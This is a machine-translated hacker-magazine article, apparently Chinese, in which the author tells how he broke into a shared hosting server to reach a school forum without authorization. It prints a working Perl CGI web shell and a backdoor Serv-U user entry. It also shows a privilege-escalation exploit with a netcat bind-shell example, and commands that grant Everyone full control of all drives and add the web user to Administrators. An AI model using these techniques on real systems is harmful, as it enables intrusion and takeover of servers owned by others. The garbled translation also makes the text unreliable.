Note: The technology of this article is not the latest, and the technical content involved is not a lot, and it is important that the penetration thinking is. This article has been published in the "hacker X file" published, copyright belongs to www.4ngel.net and its magazine.
I finally graduated from high school, I must study hard in summer vacation, I have been studying, and the previous invasion is small. It is the study like this. The actual experience is too lacking, so I decided that the summer vacation will make up the infiltration technology, and you can look at the domestic The security of the host. Summer vacation has been studying a month of penetration in June, learns a lot of good ideas and experience from Xiaolu. Thank you, thank you.
In more than a month, penetrate through hundreds of servers, independent, have a virtual host, group, domestic and foreign countries, I found an extremely serious problem, foreign server, universal security is very High, the administrator's security awareness is very high, be a proportion, if the average domestic average 10 servers can penetrate into 6 or more, the abroad, Taiwan, the average 10 servers can only penetrate 1. Of course, my level is also a problem. However, it reflects that the level of domestic administrators is indeed more than a few grades of foreign countries. The technical and consciousness of domestic administrators is urgently needed to increase significantly.
However, there is also a BT administrator, I have met several servers. One of the Documents and Settings directories also have nsfocus directories. Is it the security of NSFOCUS? We didn't take this server, there is another, that is, today's focus.
Once I saw a school forum (http://www.school.com), it was very hot, suddenly interested, ping, found that four bags returned to Request Timed Out. Estimated to engage in strategy or firewall I like this kind of Web security, naturally like to find a loan from the site, since I learned the web, I will fall a quirk, that is, if I can't find any vulnerabilities from the web, I would rather give it to give up any vulnerability scanner.
Probably looked at the site. It is a forum, using Leadbbs, and other means, there are other ways, because I just visit this IP, return "NO Web Site IS Configured At this Address.", Initially judging is a virtual host, a few black stations Why is the success chance of madfold? Because there is http://whois.webhosting.info website, you can query how many domain names have been bound to IP. If it is a virtual host, this school forum has no vulnerability, does not mean other sites, soon, I passed a small company site (http://ihost /) DVBBS 6.0 pass an Aspshell, who Know that you can operate your own directory. And your directory does not execute the programs, but also use NFSO, manually jump into the directory in the URL, and there is not much to browse, important program files and documents and settings directory can't see, from the information feedback from Aspshell. Look, each site has set a separate user, and it seems that everything is deadlocked.
There is no purpose jump catalog ...
I habitually jumped to C: / PHP in URL, I didn't expect to see it. The host is likely to support PHP. I immediately passed a phpspy, very lucky, and saw the landing entrance, but no I thought that I found that PHP.INI was also set, and the security mode was opened. The PHPINFO function was also disabled. It couldn't see the detailed system information. However, watching PHPSPY comes with the probe can be found, allow_url_fopen, display_errors, register_globals Unfix, SYSTEM, PASSTHRU, EXEC, Shell_exec several functions are disabled, direct jump directory still only see these directorys, all sites are similar to "D: / Websites / School .com # dlfjurdlkfjk "This string is different from each site directory, but also jump, and later I guess the string behind it is FTP password, I have been experimenting, I can't log in, it seems that Liu is dark, hope It's broken ... Is it over? No, I tried FTP:
Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C: / Documents and Settings / Administrator> ftp www.school.comconnected to www.chool.com. 220 Welcome To FTP Server ... User (www.bjtrq.com:): 331 User Name Okay, Need Password. Password: 530 NOT Logged in. Login failed. Ftp> bye 221 goodbye!
Judging from the information returned, we still have hope. Although he modified the Banner of FTP Server, from User Name Okay, Need Password. This is a bold judgment. This server is using Serv-U. I have to have all version of the EXPLOIT, if I have Can pass one, and be executed, everything is clear. Do you think about which directory can you write? At the time, there was no sessionData directory in the C: / PHP directory, and it was not an automatic installation version, and the estimated administrator changed the session directory. Otherwise, this directory was written by Everyone ...
It turns out that I have forgotten a most important directory, c: / documents and settings / all users you can know a lot of information from this directory, this directory is general, at least everyone readable, so we can know a lot of useful information , Go directly to this directory through my aspshell manual, huh, huh. I saw a directory tree I wanted to see.
Application DatadocumentsDRMFavoritesteStemplates "Start" menu desktop
Immediately try the creation, but unfortunately, the directory inside includes the subdirectory. The BT administrator privilege setting is really strict, but we still have harvested, that is, "c: / documents and settings / all users /" start " In the menu / program / "directory, useful information about the results of the decision,
ActiveState ActivePerl 5.8Administrative ToolsDeerfield.comDTempIPSentryMBM 5NetMeterNetwork ICEPersits Software AspEmailPersits Software AspJpegServ-U FTP ServerSymantec Client SecurityWindows optimize the master boot manager WinRAR tool accessories Oh, now we know a lot of useful information, looking at these things, you can see administrators Safety, efficiency is very concerned, puting Perl, that is, it may support CGI, IpSentry can detect all kinds of services for the website in real time, when a service is stopped, the software will play Pager, or email, or vocal, or run other Software to remind administrators to ensure that the server can process the server, indicating that the administrator is responsible, NetMeter can monitor network traffic, installed the black ice firewall and Norton anti-virus server version, indicating that the security of the administrator is very careful It's still not enough, I also installed another firewall - VisNetic Firewall, is really BT to home, installed the master, and it's time to see this administrator or more love. From the management tool, we also saw the terminal service client generator .lnk, terminal service configuration .Lnk, there is a terminal service, this is good, can be smooth, one 3389 broiler.
First download any shortcuts of Serv-U through Aspshell, then view the target of the property locally, huh, the original SERV-U directory is "c: / program filesewfq4qrqtgy4635 / serv-u /", this is good, directly jump table of Contents. Oh ~, yes ~~, saw it, immediately modify the servudaemon.ini file, this server actually put 280 users, is amazing ... Whether, first add [Domain1] Run:
User281 = angel | 1 | 0
Plus
[User = angel | 1] password = NG98F85379EA68DBF97BAADCA99B69B805HOMEDIR = D: / WebsiteSrelpaths = 1Timeout = 600maintence = systemaccess1 = D: / Websites | rwamelcdpskeyvalues =
Add an anger, the password is 111111, with the highest permission execution, then we can ftp to Quote Site Exec XXXXXXXX, 嘻嘻 中 ...
However, the cruel reality once again smashed my plan, and submit it after modifying the document, actually did not have a successful revision, it seems to be permission, and the authority rights is a huge person.
But there is hope, because we just saw the system installed black ice, some versions exist "ISS RealSecure / Blackice Protocol Analysis Module SMB Analysis Stack Overflow Vulnerability", can be used remotely, there is no compiler on hand, there is no way to compile code .
There is Perl, this is a big breakthrough, because the Perl directory generally wants ERVERYOED completely controlled, whether he uses ISAP or Perl.exe is usually writable, executable, download Perl shortcut to see the path , Huh, I saw it, I originally d: / user / bin is all the files in the bin directory stored in Perl, so that this directory may be written, or you may be executed, you will pass a Su.exe immediately (for all version of the current SERV-U local upgraded permission vulnerability), huh, huh, pass it, great, now it is implemented, just try to ask Aspshell, PHPSHELL can't, look at the last hope, find, find, finally I found a CGISHELL on my hard drive. I am old, the date of the file is June 30, 2002, the code is as follows: #! / Usr / bin / perlbinmode (stdout); Syswrite (stdout, "Content-Type: Text / HTML / R / N / R / N ", 27); $ _ = $ env {query_string}; s /% 20 / / ig; s /% 2fig; $ exECTHIS = $ _; syswrite (stdout,"
/ r / n ", 13); Open (stderr,"> & stdout ") || DIE" can't redirect stderr "; system ($ exECTHIS); syswrite (stdout," / r / n < / Html> / r / n ", 17); Close (stderr); Close (stdout); exit;I have used the best CGISHELL, saved as a CGI file, dizzy ... actually does not support! A burst of depression, after 2 seconds depressed, think of there is also a hopes, that is, the PL, we haven't tried PL to expand, change the CGI file to the PL file, submit http: // Anyhost // cmd.pl?dir, my God! !
Display "Reject Access", can finally be executed! Too excited, submit it immediately:
Http: //ANYHOST / RMD.PL? D: /user/bin/su.exe
return:
Serv-U> 3.x local expedition by xiaolu usage: serv-u.exe "Command" Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
Hey ~~ is now IUSR permissions, how is it? See you is still not dead this time? submit:
Http: //anyhost/ -cmd.pl? d: /user/bin/su.exe "Cacls.exe C: / E / T / G Everyone: f" http: //aNyhost//cmd.pl? d: /user/bin/su.exe "Cacls.exe D: / E / T / G Everyone: f" http: //anyhost/cmd.pl? D: /user/bin/su.exe "Cacls.exe E : / E / T / G Everyone: F "http: //anyhost/ -cmd.pl? D: /user/bin/su.exe" Cacls.exe f: / e / t / g everyone: f "Return to The information is successful! ! !
SERV-U> 3.x local Exploit by xiaolu <220 Serv-U FTP Server V5.2 for Winsock Ready ...> user local name okay, ned password. *********** ******************************************> Pass # l @ $ AK # @ P <230 user logged in, proceed. ************************************** ******************> Site maintenance *********************************** ************************** [ ] CREANG New Domain ... <200-domainid = 2 <220 Domain settings saved **** *********************************************************** [ ] Domain XL: 2 Created [ ] Creating Evil User <200-user = XL 200 User Settings Saved ************************************** **************************** [ ] Now Exploiting ...> user xl <331 user name okay, nesed password. ** *********************************************************** **> Pass 111111 <230 user logged in, proceed. ************************************************* **************** [ ] now Executing: Cacls.exe C: / E / T / G Everyone: F <220 Domain deleted ******** *********************************** ******************
Every time I submit once, I will wait for it, because these commands take time to handle, after a while, set all partitions to Everyone fully controlled, can operate the hard disk, but some commands are still limited, because the permissions are still No improvement, now we upgrade your users as an administrator:
http://anyhost/ -cmd.pl? D: /user/bin/su.exe "Net localgroup administrators IUSR_Anyhost / Add" Now we pass the web way, the executed command is executed by the Administrator, I believe here What should I do now? Do you know? I will find the catalog of that school, go in ~~ The purpose reached, I still want to be a 3389 broiler, think about it, this BT administrator's site, I also occupy how long, leave points to tell him The desktop is OVER.
Seriously, for so long, I have never met such a tricky virtual host, or if I installed Perl, it is really a bundle! This article is not high, just share the idea of hope, if there is a person from it, this article completes its mission.
